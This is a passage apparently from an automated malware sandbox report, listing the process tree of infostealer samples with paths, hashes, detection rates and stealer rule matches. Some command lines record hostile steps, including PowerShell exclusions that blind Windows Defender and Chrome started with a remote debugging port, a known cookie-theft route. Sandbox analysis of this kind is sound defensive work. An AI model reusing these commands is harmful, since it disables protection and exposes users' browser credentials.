                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,9356535502589347400,8547874231582347487,262144 /prefetch:8
                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                          Start time:08:20:38
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe"
                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                          File size:4'450'816 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A549F15D1418FB4207AADB4BA813A36
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                          Start time:08:20:45
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                                                                                                                                                                                                                                                          Imagebase:0x730000
                                                                                                                                                                                                                                                          File size:1'114'112 bytes
                                                                                                                                                                                                                                                          MD5 hash:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                          Start time:08:20:52
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                                                                                                                                                                                                                                                          Imagebase:0x600000
                                                                                                                                                                                                                                                          File size:1'114'112 bytes
                                                                                                                                                                                                                                                          MD5 hash:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2310077330.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2318789762.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                          Start time:08:20:54
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe"
                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                          File size:1'988'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:31093EBDC9EA634763874604C07E0F69
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2359297858.0000000004C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2350817257.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:08:20:59
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                          Imagebase:0x170000
                                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2359022385.0000000003350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000002.2372094151.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                          Start time:08:20:59
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 872
                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                          Start time:08:21:00
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                                                                                                                          File size:3'008'512 bytes
                                                                                                                                                                                                                                                          MD5 hash:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000003.2397272020.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000002.2439837869.0000000000611000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                          Start time:08:21:00
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe"
                                                                                                                                                                                                                                                          Imagebase:0x2d0000
                                                                                                                                                                                                                                                          File size:21'504 bytes
                                                                                                                                                                                                                                                          MD5 hash:14BECDF1E2402E9AA6C2BE0E6167041E
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          • Detection: 11%, ReversingLabs
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                          Start time:08:21:00
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                          Start time:08:21:02
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                          Start time:08:21:02
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                          Start time:08:21:06
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HIDGCFBFBF.exe"
                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                          Start time:08:21:06
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                          Start time:08:21:06
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Documents\HIDGCFBFBF.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Documents\HIDGCFBFBF.exe"
                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                          File size:3'008'512 bytes
                                                                                                                                                                                                                                                          MD5 hash:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000003.2472589310.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.2513854677.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                          Start time:08:21:07
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                                                                                                                                                                                                                                                          Imagebase:0x6d0000
                                                                                                                                                                                                                                                          File size:765'568 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                          Start time:08:21:07
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                          Start time:08:21:11
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                                                                                                                                                                                                                                                          Imagebase:0x6d0000
                                                                                                                                                                                                                                                          File size:765'568 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2623844252.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2626627221.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2644595134.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2618199887.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2617522979.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2646781296.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2638097998.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2640013020.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2642609561.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2632736175.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2628001159.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2649570679.0000000001087000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2628917343.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2648748009.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.2621190096.0000000001038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                          Start time:08:21:12
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                          Start time:08:21:12
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                          Start time:08:21:20
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                          Start time:08:21:22
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2288,i,6769742919243767367,11351755421190753691,262144 /prefetch:8
                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                          Start time:08:21:29
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe"
                                                                                                                                                                                                                                                          Imagebase:0x5f0000
                                                                                                                                                                                                                                                          File size:1'275'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:577CD52217DA6D7163CEA46BB01C107F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000003.2812288913.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                          Start time:08:21:49
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe"
                                                                                                                                                                                                                                                          Imagebase:0xca0000
                                                                                                                                                                                                                                                          File size:4'442'112 bytes
                                                                                                                                                                                                                                                          MD5 hash:EBFE28CB77F3D1246693FA372420D022
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                          Start time:08:22:00
                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
